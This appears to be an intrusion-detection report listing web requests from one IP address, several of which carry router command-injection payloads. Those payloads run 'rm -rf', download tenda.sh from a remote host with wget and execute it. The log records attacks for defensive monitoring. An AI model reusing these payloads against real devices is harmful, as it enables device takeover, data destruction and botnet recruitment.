Summary: 5 incidents discovered from one client

	185.224.128.191 | 5 incidents | impact ∑: 80	attacks only
	Description: A random scan and human attacker yesterday. A total of 5 incidents where discovered by phpids detection modules.
Impact Tags Remote-City Remote-Host Remote-Logname Remote-User Date Request Final-Status Bytes-Sent Referer User-Agent 0 none - 185.224.128.191 - - Sun, 14 Jan 2024 04:13:51 +0100 GET / HTTP/1.1 302 453 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46 17 dt id lfi xss csrf rfe - 185.224.128.191 - - Sun, 14 Jan 2024 05:45:17 +0100 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd /tmp; rm -rf *; wget http://104.168.5.4/tenda.sh; chmod 777 tenda.sh;/bin/sh tenda.sh) HTTP/1.1 302 865 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 17 dt id lfi xss csrf rfe - 185.224.128.191 - - Sun, 14 Jan 2024 05:45:17 +0100 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd /tmp; rm -rf *; wget http://104.168.5.4/tenda.sh; chmod 777 tenda.sh;/bin/sh tenda.sh) HTTP/1.1 302 864 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 0 none - 185.224.128.191 - - Sun, 14 Jan 2024 06:39:10 +0100 GET / HTTP/1.1 302 453 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46 17 dt id lfi xss csrf rfe - 185.224.128.191 - - Sun, 14 Jan 2024 07:59:11 +0100 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd /tmp; rm -rf *; wget http://104.168.5.4/tenda.sh; chmod 777 tenda.sh;./tenda.sh) HTTP/1.1 302 845 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 17 dt id lfi xss csrf rfe - 185.224.128.191 - - Sun, 14 Jan 2024 07:59:11 +0100 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd /tmp; rm -rf *; wget http://104.168.5.4/tenda.sh; chmod 777 tenda.sh;./tenda.sh) HTTP/1.1 302 844 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 0 none - 185.224.128.191 - - Sun, 14 Jan 2024 10:14:27 +0100 GET / HTTP/1.1 302 403 - - 0 none - 185.224.128.191 - - Sun, 14 Jan 2024 10:59:38 +0100 GET / HTTP/1.1 302 453 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46 12 dt id lfi rfe - 185.224.128.191 - - Sun, 14 Jan 2024 13:39:42 +0100 GET /cgi-bin/luci/;stok=b3bafdbb03f0dfcf96bef095f6060d64/admin/diagnosis?diag=tracert&tracert_address=127.0.0.1;rm -rf *; cd /tmp; wget http://104.168.5.4/tenda.sh; chmod 777 tenda.sh; ./tenda.sh HTTP/1.1 302 931 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246 0 none - 185.224.128.191 - - Sun, 14 Jan 2024 15:10:32 +0100 GET / HTTP/1.1 302 453 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46 0 none - 185.224.128.191 - - Sun, 14 Jan 2024 17:56:38 +0100 GET /config/getuser?index=0 HTTP/1.1 302 466 - Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0